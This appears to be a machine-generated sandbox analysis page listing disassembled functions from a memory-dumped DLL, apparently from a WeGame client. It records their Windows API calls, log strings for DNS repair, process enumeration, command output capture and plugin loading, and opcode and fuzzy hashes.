                                        Function 6C0C6642 Relevance: 1.5, APIs: 1, Instructions: 24encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,B33B76E5,00000000,00000000,6C318CE3,000000FF,?,6C0C74A9,?,00000010,0000001C,6C0C59BA,?,?,?), ref: 6C0C6675
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ContextCryptRelease
                                        • String ID:
                                        • API String ID: 829835001-0
                                        • Opcode ID: e97decc3d15919b44b9cd0338006931ab0ac2a7462d9aa0b5dcc4e5cafc43ce6
                                        • Instruction ID: 02c2890f7e8848d91ce0ab4ae67639546243f52c1b6d0088913a918b6d5b33d9
                                        • Opcode Fuzzy Hash: e97decc3d15919b44b9cd0338006931ab0ac2a7462d9aa0b5dcc4e5cafc43ce6
                                        • Instruction Fuzzy Hash: F5F0ED72A49648EFCB25CF64CD41B59BBF8FB09B24F20476AE422D6AD0CB796500CA45
                                        Function 6C0C6688 Relevance: 1.5, APIs: 1, Instructions: 21encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptReleaseContext.ADVAPI32(?,00000000,B33B76E5,?,Function_002760CD,000000FF), ref: 6C0C66B3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ContextCryptRelease
                                        • String ID:
                                        • API String ID: 829835001-0
                                        • Opcode ID: 2c8fcd7eb0cc6481731ce66e780ac880fd2f16703e964f7ff94f3ff8dbbd5708
                                        • Instruction ID: 8ca50650a4b744985d9897ad6d0b561c6813de4d239656bb91d21a3ff5de48fe
                                        • Opcode Fuzzy Hash: 2c8fcd7eb0cc6481731ce66e780ac880fd2f16703e964f7ff94f3ff8dbbd5708
                                        • Instruction Fuzzy Hash: 4DE04F76648648EFC712CF54C801B45B7F8F70AB14F100669E422D7AD0CB396404CA00
                                        Function 6C0C6C9C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z.COMMON(?,?), ref: 6C0C6CA3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?from_json@jsonbind@@Json@@@Value@
                                        • String ID:
                                        • API String ID: 2593738861-0
                                        • Opcode ID: 699a2249a92d441694e35bea20fa06a2f7649fcbd3cb6b9dfcf7814da861a750
                                        • Instruction ID: 7fea89b9289427f0fcb31066c7038038aa825e5c058f2c382d542fc73d3ec5b7
                                        • Opcode Fuzzy Hash: 699a2249a92d441694e35bea20fa06a2f7649fcbd3cb6b9dfcf7814da861a750
                                        • Instruction Fuzzy Hash: 46B012B300C30C3B65181691F802DC6BB8DC710170710842BF60804A806D37F46052BC
                                        Function 6C0C6D1E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?to_json@jsonbind@@YAHPAXAAVValue@Json@@@Z.COMMON(?,?), ref: 6C0C6D25
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?to_json@jsonbind@@Json@@@Value@
                                        • String ID:
                                        • API String ID: 1197194930-0
                                        • Opcode ID: 6b4b75457bf38a675d386b2a21e1941492bcacc9d3599dabfcee34674c00fe44
                                        • Instruction ID: 4a8cebd837ba7528d7484f8361530b3fa07887870577c2dfe3f53246df226d5a
                                        • Opcode Fuzzy Hash: 6b4b75457bf38a675d386b2a21e1941492bcacc9d3599dabfcee34674c00fe44
                                        • Instruction Fuzzy Hash: EAB0127300C30C3B66081691F902DC67B8CD711170710802BF60405A416E37F06055AC
                                        Function 6C1365DE Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        • Opcode ID: 1225f191949c3cf6f3e1d5f44405819bde8913935478eb4969d3cecdd839e8d5
                                        • Instruction ID: 7c29cedf9593770d4d5e9aa147d46069f4a42ac83ae9153d2c213ec162272f95
                                        • Opcode Fuzzy Hash: 1225f191949c3cf6f3e1d5f44405819bde8913935478eb4969d3cecdd839e8d5
                                        • Instruction Fuzzy Hash: FED0E9756012099FC710EF58D144955FBE5BB59658714C1A9DA088F702E732E852CA94
                                        Function 6C0FE782 Relevance: 75.7, APIs: 30, Strings: 13, Instructions: 468COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FE78C
                                        • CoInitializeEx.OLE32(00000000,00000002,000001F4,6C0FE701,?), ref: 6C0FE7AD
                                        • CoInitializeEx.OLE32(00000000,00000000), ref: 6C0FE7B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Initialize$H_prolog3_
                                        • String ID: Caption$DNSServerSearchOrder$Index$SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=TRUE$SetDNSServerSearchOrder$WQL$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=%d$[repair_dns] success.$d:\ci_dev\wegame_client\codes\common\src\dns_repair.cpp$root\cimv2$virtual$vmware
                                        • API String ID: 2604203524-2417071372
                                        • Opcode ID: bef0ef78ca19dd71f8f89e6ec510e6ff3499b8f7b1ba510c9eb6313d513bae4c
                                        • Instruction ID: 1bc38a051a4dbb3bb2bf759c87faeb4c0202ff6712c2d0b406180f2f4152309a
                                        • Opcode Fuzzy Hash: bef0ef78ca19dd71f8f89e6ec510e6ff3499b8f7b1ba510c9eb6313d513bae4c
                                        • Instruction Fuzzy Hash: A2025D71A01219AFEB25CF64CC94FDAB7B8AF49704F1041E8F929A7650DB319E81CF90
                                        Function 6C152CBF Relevance: 68.7, APIs: 31, Strings: 8, Instructions: 435processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C152CC9
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 6C152D41
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • GetLastError.KERNEL32 ref: 6C152D4C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C152D52
                                        • ?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z.COMMON(?,?), ref: 6C152DAA
                                        • GetLastError.KERNEL32 ref: 6C152DB5
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C152DBB
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C152E20
                                        • memset.VCRUNTIME140(?,00000000,00000228,00000002,00000000), ref: 6C152E44
                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 6C152E5E
                                        • ?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z.COMMON(?,?,?,00000000,0000022C), ref: 6C152ED5
                                        • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,0000022C), ref: 6C152F1F
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C152F2F
                                        • memset.VCRUNTIME140(?,00000000,00000208), ref: 6C152FC5
                                        • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000104), ref: 6C152FF7
                                        • GetLastError.KERNEL32(00000000,00000000,?,00000104), ref: 6C15305A
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C153062
                                        • CloseHandle.KERNEL32(00000000), ref: 6C1530CA
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C1530DB
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,000005EC,6C3CE62F), ref: 6C153118
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6C153145
                                        • memset.VCRUNTIME140(?,00000000,00000424,00000008,?), ref: 6C153162
                                        • Module32FirstW.KERNEL32(00000000,0000022C), ref: 6C15317C
                                        • CloseHandle.KERNEL32(00000000), ref: 6C1531E2
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 6C153286
                                        • GetLastError.KERNEL32(00000002,00000000), ref: 6C15329C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C1532A4
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 6C152FD9
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 6C153294
                                        Strings
                                        • [Sys_wrapper][IsProcessRunning]u8to16 fail, xrefs: 6C152D95
                                        • [Sys_wrapper][IsProcessRunning]extract_name fail, xrefs: 6C152DF6
                                        • [Sys_wrapper][IsProcessRunning]CreateToolhelp32Snapshot fail, err:%d, xrefs: 6C1532E0
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C152D7E, 6C152DDF, 6C152F53, 6C153086, 6C1530FF, 6C15320E, 6C1532C8
                                        • [Sys_wrapper][IsProcessRunning]Open Module Failed:%u, xrefs: 6C15322E
                                        • [Sys_wrapper][IsProcessRunning]Find Process:%s, pid:%u, xrefs: 6C152F81
                                        • [Sys_wrapper][IsProcessRunning]Open Process Failed:%u, xrefs: 6C15311F
                                        • [Sys_wrapper][IsProcessRunning]GetModuleFileNameExW (len:%d), err:%x, xrefs: 6C1530A1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$ErrorLast$CloseHandleU?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@memset$?extract_name@common@ierd_tgp@@CreateFirstH_prolog3_Process32SnapshotToolhelp32V34@@W@2@@std@@$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@FileH_prolog3H_prolog3_catch_ModuleModule32NameNextOpenProcessU?$char_traits@V?$allocator@V?$basic_string@W@2@@4@@_wcsicmp
                                        • String ID: [Sys_wrapper][IsProcessRunning]CreateToolhelp32Snapshot fail, err:%d$[Sys_wrapper][IsProcessRunning]Find Process:%s, pid:%u$[Sys_wrapper][IsProcessRunning]GetModuleFileNameExW (len:%d), err:%x$[Sys_wrapper][IsProcessRunning]Open Module Failed:%u$[Sys_wrapper][IsProcessRunning]Open Process Failed:%u$[Sys_wrapper][IsProcessRunning]extract_name fail$[Sys_wrapper][IsProcessRunning]u8to16 fail$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 711256695-191200958
                                        • Opcode ID: b1fbdc0e07e96d2d9801893808cbcbe8361017df5490fd7d0e8e3fb78ca06be3
                                        • Instruction ID: 66f3e2628198cacb140c6332a8e07d8b76c388acf6b2cb344fedc84d649aeab0
                                        • Opcode Fuzzy Hash: b1fbdc0e07e96d2d9801893808cbcbe8361017df5490fd7d0e8e3fb78ca06be3
                                        • Instruction Fuzzy Hash: 6D02D2B1A01758ABDB24DB64CC98BDDB7B4AF25308F5041D8E418B7680DB35AF89CF51
                                        Function 6C173C89 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 410processfilesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(B33B76E5,?,?,?,?,6C33310D,000000FF), ref: 6C173CC7
                                        • memset.VCRUNTIME140(?,00000000,00000044), ref: 6C173D56
                                        • memset.VCRUNTIME140(?,00000000,00000010,?,00000000,00000044), ref: 6C173D66
                                        • CreatePipe.KERNEL32(?,?), ref: 6C173DC4
                                        • GetLastError.KERNEL32 ref: 6C173DCE
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C173DDA
                                        • memset.VCRUNTIME140(?,?,?,?,00000000,00000800), ref: 6C173E77
                                        • StrNCatW.SHLWAPI(?,?,000003FF), ref: 6C173E96
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 6C173EBB
                                        • GetLastError.KERNEL32 ref: 6C173EC5
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C173ED1
                                        • CreateJobObjectA.KERNEL32(00000000,00000000), ref: 6C173F29
                                        • memset.VCRUNTIME140(?,00000000,00000070), ref: 6C173F46
                                        • SetInformationJobObject.KERNEL32(00000000,00000009,?,00000070), ref: 6C173F64
                                        • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 6C173F71
                                        • GetLastError.KERNEL32 ref: 6C173F79
                                        • CloseHandle.KERNEL32(?), ref: 6C173F87
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C174000
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 6C174013
                                        • GetLastError.KERNEL32 ref: 6C17401D
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C174025
                                        • ReadFile.KERNEL32(?,?,00000FFF,?,00000000), ref: 6C173FF2
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • CloseHandle.KERNEL32(00000000), ref: 6C174097
                                        • CloseHandle.KERNEL32(00000000), ref: 6C1740AC
                                        • CloseHandle.KERNEL32(00000000), ref: 6C1740C1
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C1740C7
                                        Strings
                                        • [GetCmdOutput] Failed to create pipe. err_code={}, xrefs: 6C173E24
                                        • d:\ci_dev\wegame_client\codes\common\src\utility.cpp, xrefs: 6C173CEB, 6C173E06, 6C173EFD, 6C174049, 6C1740EB
                                        • [GetCmdOutput] cmdline={}, xrefs: 6C173D19
                                        • [GetCmdOutput] Failed to create process. err_code={}, xrefs: 6C173F1B
                                        • [GetCmdOutput] Failed to get exit code. err_code={}, xrefs: 6C174067
                                        • [GetCmdOutput] exitCode={} cmdline={}, xrefs: 6C17411E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$CloseErrorHandleLastObjectmemset$CreateProcess$AssignCodeExitFileH_prolog3InformationPipeReadSingleWait
                                        • String ID: [GetCmdOutput] Failed to create pipe. err_code={}$[GetCmdOutput] Failed to create process. err_code={}$[GetCmdOutput] Failed to get exit code. err_code={}$[GetCmdOutput] cmdline={}$[GetCmdOutput] exitCode={} cmdline={}$d:\ci_dev\wegame_client\codes\common\src\utility.cpp
                                        • API String ID: 2953213574-3026063238
                                        • Opcode ID: c1c55ff7d30324f6531af6f7b00199d845bc06bd15f96da88433f709a494dd0a
                                        • Instruction ID: dd3defb5ab25c5a5ec956fd05f6257cbee460a3318cbc79b8fbc35640e44758b
                                        • Opcode Fuzzy Hash: c1c55ff7d30324f6531af6f7b00199d845bc06bd15f96da88433f709a494dd0a
                                        • Instruction Fuzzy Hash: 4FF1AC71A00218AFDB21DB64CC45BE9B7F8EF45304F548199E109AB680EF75AF89CF61
                                        Function 6C0F7C2D Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 321libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 6C0F7C56
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,?,?), ref: 6C0F7C7C
                                          • Part of subcall function 6C0C7323: __EH_prolog3.LIBCMT ref: 6C0C732A
                                        • ?extract_path@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z.COMMON(?,?,00000000), ref: 6C0F7CA5
                                          • Part of subcall function 6C12F04B: __EH_prolog3_GS.LIBCMT ref: 6C12F052
                                          • Part of subcall function 6C12F04B: ?has_parent_path@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON(?,00000034), ref: 6C12F078
                                          • Part of subcall function 6C12F04B: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,00000034), ref: 6C12F088
                                          • Part of subcall function 6C0BD3C4: memmove.VCRUNTIME140(00000008,?,00000008,?,?,?,?,6C0BD33E,?,00000000,?,6C100877,?,0000001C,6C0BF12C,?), ref: 6C0BD3F6
                                        • GetTickCount.KERNEL32 ref: 6C0F7CE2
                                        • LoadLibraryW.KERNEL32(?), ref: 6C0F7CFA
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0F7D13
                                        • LoadLibraryW.KERNEL32(?), ref: 6C0F7D8C
                                        • GetLastError.KERNEL32 ref: 6C0F7D9C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0F7DAA
                                          • Part of subcall function 6C0F729F: __EH_prolog3_GS.LIBCMT ref: 6C0F72A9
                                          • Part of subcall function 6C0F729F: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,0000008C), ref: 6C0F72EA
                                          • Part of subcall function 6C0F729F: ?file_exists@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,?,?,0000008C), ref: 6C0F7301
                                          • Part of subcall function 6C0F729F: ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?,?,?,?,?,0000008C), ref: 6C0F736C
                                          • Part of subcall function 6C0F729F: ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,00000001,?,?,?,?,?,?,0000008C), ref: 6C0F737C
                                        Strings
                                        • [Component_mgr]load_interface, GetProcAddress _QueryPluginInterface failed, error:%d, xrefs: 6C0F7FEC
                                        • [Component_mgr]load_interface, Load library {} failed, error:%d, xrefs: 6C0F7E01
                                        • _QueryPluginInterface@12, xrefs: 6C0F7F4B
                                        • d:\ci_dev\wegame_client\codes\common\src\component_mgr.cpp, xrefs: 6C0F7D37, 6C0F7DCE, 6C0F7E84, 6C0F7FD4
                                        • _QueryPluginInterface@8, xrefs: 6C0F7EF9
                                        • [Component_mgr]retry load library {}, xrefs: 6C0F7D65
                                        • [Component_mgr]load library elpase:{} , name:{}, xrefs: 6C0F7EDA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$H_prolog3_$?get_log_instance@base@@D@std@@LibraryLoadLogger@1@U?$char_traits@V?$allocator@V?$basic_string@W@2@@std@@$?extract_path@common@ierd_tgp@@?file_exists@common@ierd_tgp@@?get_exe_path_ex@?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?has_parent_path@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?report@?u16to8@common@ierd_tgp@@?u8to16@common@ierd_tgp@@Application@common@ierd_tgp@@CountD@2@@4@@D@2@@std@@ErrorH_prolog3LastQos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@TickV123@V34@@Vpath@filesystem@3@W@2@@4@@W@2@@std@@@memmove
                                        • String ID: [Component_mgr]load library elpase:{} , name:{}$[Component_mgr]load_interface, GetProcAddress _QueryPluginInterface failed, error:%d$[Component_mgr]load_interface, Load library {} failed, error:%d$[Component_mgr]retry load library {}$_QueryPluginInterface@12$_QueryPluginInterface@8$d:\ci_dev\wegame_client\codes\common\src\component_mgr.cpp
                                        • API String ID: 3916375037-2184993025
                                        • Opcode ID: bc029efc62b34cc2abf92d3cec8910aeb1f979fb217ec6b6400df6c05c98d0a9
                                        • Instruction ID: b6d4f64d599d14c3f28adac04ca8b74e8893ae003f2c774df8d44aa702a749e0
                                        • Opcode Fuzzy Hash: bc029efc62b34cc2abf92d3cec8910aeb1f979fb217ec6b6400df6c05c98d0a9
                                        • Instruction Fuzzy Hash: E8D1AF30D00259DBDB24DFA8C850BEDBBF4AF14308F5044ADD515B7A81EB75AA89CF92
